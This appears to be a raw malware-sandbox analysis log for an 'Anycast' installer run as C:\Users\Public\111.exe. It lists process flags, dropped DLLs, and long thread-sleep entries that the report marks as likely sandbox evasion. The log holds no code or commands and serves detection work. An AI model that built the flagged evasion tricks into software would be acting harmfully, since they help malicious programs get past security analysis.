        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Opens the same file many times (likely Sandbox evasion)
        Source: C:\Windows\System32\rundll32.exeFile opened: \Device\RasAcd count: 37130Jump to behavior
        Source: C:\Windows\System32\rundll32.exeFile opened: \Device\RasAcd count: 34048Jump to behavior
        Source: C:\Windows\System32\rundll32.exeFile opened: \Device\RasAcd count: 31850Jump to behavior
        Source: C:\Program Files (x86)\Anycast\Anycast.exeMemory allocated: 1740000 memory reserve | memory write watch
        Source: C:\Program Files (x86)\Anycast\Anycast.exeMemory allocated: 37A0000 memory reserve | memory write watch
        Source: C:\Program Files (x86)\Anycast\Anycast.exeMemory allocated: 34C0000 memory reserve | memory write watch
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 2161Jump to behavior
        Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 4782Jump to behavior
        Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 6811Jump to behavior
        Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 6449Jump to behavior
        Source: C:\Program Files (x86)\Anycast\Anycast.exeWindow / User API: threadDelayed 5640
        Source: C:\Program Files (x86)\Anycast\Anycast.exeWindow / User API: threadDelayed 3846
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.Collections.Immutable.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.Numerics.Vectors.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.Reflection.Metadata.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\uninst.exeJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.Security.AccessControl.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.Threading.Tasks.Extensions.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst31D0.tmp\InstallOptions.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.Buffers.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.Text.Json.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\Newtonsoft.Json.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.Drawing.Common.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\Hardcodet.NotifyIcon.Wpf.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\DotNetChecker.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst31D0.tmp\DotNetChecker.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\msvcp140.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst31D0.tmp\UserInfo.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.Configuration.ConfigurationManager.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.Security.Principal.Windows.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\Sentry.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst31D0.tmp\System.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.Text.Encodings.Web.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.Memory.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\UserInfo.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\zh-TW\Anycast.resources.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\QRCoder.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\QRCoder.Xaml.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\vcruntime140_1.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.ValueTuple.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\wintun.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.Net.Http.Formatting.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\Microsoft.Bcl.AsyncInterfaces.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\zh-CN\Anycast.resources.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\System.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\InstallOptions.dllJump to dropped file
        Source: C:\Users\Public\111.exeDropped PE file which has not been started: C:\Program Files (x86)\Anycast\System.Security.Permissions.dllJump to dropped file
        Source: C:\Windows\System32\loaddll64.exeAPI coverage: 2.8 %
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeAPI coverage: 3.8 %
        Source: C:\Windows\System32\loaddll64.exe TID: 3496Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5012Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5012Thread sleep count: 2161 > 30Jump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5012Thread sleep time: -21610000s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31487s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36536s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43257s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31507s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43795s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36181s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39229s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34477s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41324s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44748s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41889s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42558s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41208s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44548s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32323s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41562s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41816s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43122s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41677s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32985s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30381s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34038s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44933s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42717s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33356s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35901s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42726s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43431s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35441s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42736s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44154s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42642s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37351s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41993s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36370s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38652s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38198s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39344s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43693s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31573s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42629s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36949s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43422s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37594s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35042s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32335s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42354s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38346s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41662s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40362s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35734s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39636s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39753s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36659s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41858s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36655s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43204s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43036s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30435s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40539s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42497s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32358s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39096s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41440s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34078s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36960s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33804s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33951s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44233s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44479s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31878s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32905s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32224s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41295s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35795s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30553s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42861s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37878s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44970s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34847s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43717s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34967s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34397s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30832s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39992s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33946s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40920s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32818s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43872s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35487s >= -30000sJump to behavior
